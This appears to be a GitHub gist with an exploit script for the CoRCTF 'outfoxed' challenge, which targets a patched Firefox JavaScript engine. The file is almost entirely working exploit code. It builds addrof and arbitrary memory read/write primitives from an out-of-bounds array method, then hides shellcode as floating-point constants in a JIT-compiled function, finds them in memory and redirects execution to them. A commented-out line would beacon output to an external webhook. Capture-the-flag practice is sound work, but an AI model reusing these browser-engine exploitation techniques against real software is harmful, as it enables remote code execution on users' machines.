@d4rk-kn1gh7
Created August 26, 2021 11:10
CoRCTF - outfoxed
// One 8-byte scratch buffer seen through two views: a single double and a
// pair of 32-bit words. f2i/i2f below use the aliasing to reinterpret bits.
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
// 2^32: the multiplier that joins/splits the two 32-bit halves.
var BASE = 0x100000000
function f2i(f) {
  // Reinterpret the double's raw 64 bits as an integer by writing it through
  // the shared f64 view and reading the two 32-bit words back.
  // Values above 2^53 are not exact in a JS number.
  f64[0] = f;
  const lo = u32[0];
  const hi = u32[1];
  return hi * BASE + lo;
}
function i2f(i) {
  // Split the integer into low/high 32-bit halves and store them through the
  // shared u32 view; the typed-array store applies ToUint32, which truncates
  // the fractional quotient. Read the result back as a double.
  const lo = i % BASE;
  const hi = i / BASE;
  u32[0] = lo;
  u32[1] = hi;
  return f64[0];
}
function hex(x) {
  // Format a number as 0x-prefixed hexadecimal; negatives are printed as a
  // leading minus on the magnitude (e.g. -0x10).
  const negative = x < 0;
  const digits = Math.abs(x).toString(16);
  return negative ? `-0x${digits}` : `0x${digits}`;
}
function println(data) {
  // Prefixed log line. `print` is a JS-shell builtin, not a browser API.
  // The commented-out beacon below would have exfiltrated the same line to an
  // external endpoint; it is left disabled.
  // navigator.sendBeacon("https://webhook.site/a4d54f3b-1de9-4f06-b5db-8126654a8e8c", data)
  const line = "[*] " + data;
  print(line);
}
// A plain Array and a Uint32Array allocated back to back. `oob` is not a
// standard Array method; it appears to be supplied by the challenge's patched
// engine (its exact semantics are not visible in this file).
let arr1 = new Array(10)
let arr2 = new Uint32Array(10)
arr1[0] = 13.37
arr2[0] = 0x1234
// dumpObject(arr1)
// dumpObject(arr2)
// `offset` and the 0x38 adjustment are layout constants specific to this
// build; presumably derived from the dumpObject output above — TODO confirm.
const offset = 0x11
const arr2_addr = f2i(arr1.oob(offset)) - 0x38
println("arr2 @ "+hex(arr2_addr))
// Read 8 bytes at `addr` and return them as an integer.
// Relies on arr1.oob(offset, ...) redirecting what arr2[0..1] alias to
// (inferred from arr2_addr being derived from the same slot above — confirm).
function read(addr){
arr1.oob(offset, i2f(addr));
u32[0] = arr2[0];
u32[1] = arr2[1];
return f2i(f64[0]);
}
// Write the 8-byte integer `value` at `addr`; the mirror of read() above,
// going through the same oob slot and the two aliased arr2 elements.
function write(addr, value){
arr1.oob(offset, i2f(addr));
f64[0] = i2f(value);
arr2[0] = u32[0];
arr2[1] = u32[1];
}
// Return the address of `obj` as an integer: re-point arr2 at its own
// original target, place `obj` in the following slot, and read the slot back
// as two words. The high word is masked to 16 bits, presumably to strip tag
// bits from the stored value — TODO confirm against the engine's value layout.
function addrof(obj) {
arr1.oob(offset, i2f(arr2_addr + 0x38));
arr1.oob(offset + 1, obj);
u32[0] = arr2[0];
u32[1] = arr2[1] & 0xffff;
return f2i(f64[0]);
}
// Same as read(), but returns the 8 bytes as a double instead of an integer
// (used by the search loop below, which compares against double literals).
function read8f(addr){
arr1.oob(offset, i2f(addr));
u32[0] = arr2[0];
u32[1] = arr2[1];
return f64[0];
}
// Sanity check of the primitives: resolve arr1's own address and read one
// word at a fixed offset inside it (0x28 is a layout-specific constant).
println("Testing primitives!");
const arr1_addr = addrof(arr1);
println("arr1 @ "+hex(arr1_addr))
println("value at array: "+hex(read(arr1_addr + 0x28)))
// The locals are never used; the loop below searches compiled memory for
// `magic`'s bit pattern, so these literals serve only as data embedded in the
// JIT-compiled body (the hot loop at the bottom triggers compilation).
function func() {
const magic = 4.183559446463817e-216;
const a1 = 2.4877840611688293e-275;
const a2 = 2.4879820007592195e-275;
const a3 = 2.4879355641325583e-275;
const a4 = 2.5047751329248284e-275;
const a5 = 2.4881023834790942e-275;
const a6 = -6.828523606692364e-229;
}
// Warm up func() so the engine JIT-compiles it. Note `i`, `func_addr`,
// `shellcode_addr`, `rx_page` and `jit_addr` are all implicit globals.
for (i = 0; i < 100000; i++) {
func()
}
// Follow pointers from the function object to its compiled code; 0x28 is a
// layout-specific offset for this build.
func_addr = addrof(func)
shellcode_addr = read(func_addr + 0x28)
rx_page = read(shellcode_addr)
println("func @ "+hex(func_addr))
println("shellcode @ "+hex(shellcode_addr))
println("rx @ "+hex(rx_page))
// Clear the low 12 bits of the low word, i.e. round down to a page boundary.
f64[0] = i2f(rx_page);
u32[0] = u32[0] & 0xfffff000;
jit_addr = f2i(f64[0]);
println("jit page @ "+hex(jit_addr))
// arr1.brk()
// Linear scan from the page start for `magic` followed by `a1` 14 bytes later.
// The author notes the print inside must stay disabled for this to succeed.
while(read8f(jit_addr) != 4.183559446463817e-216 || read8f(jit_addr + 0xe) != 2.4877840611688293e-275) {
// println("searching @ "+hex(jit_addr)); //! Remove this print for the exploit to work
jit_addr = jit_addr + 1;
}
println("found shellcode @ "+hex(jit_addr));
// Skip past the first literal (same 0xe/14-byte offset as the check above),
// redirect the function's code pointer there and call it.
jit_addr = jit_addr + 14;
write(shellcode_addr, jit_addr);
// arr1.brk()
func()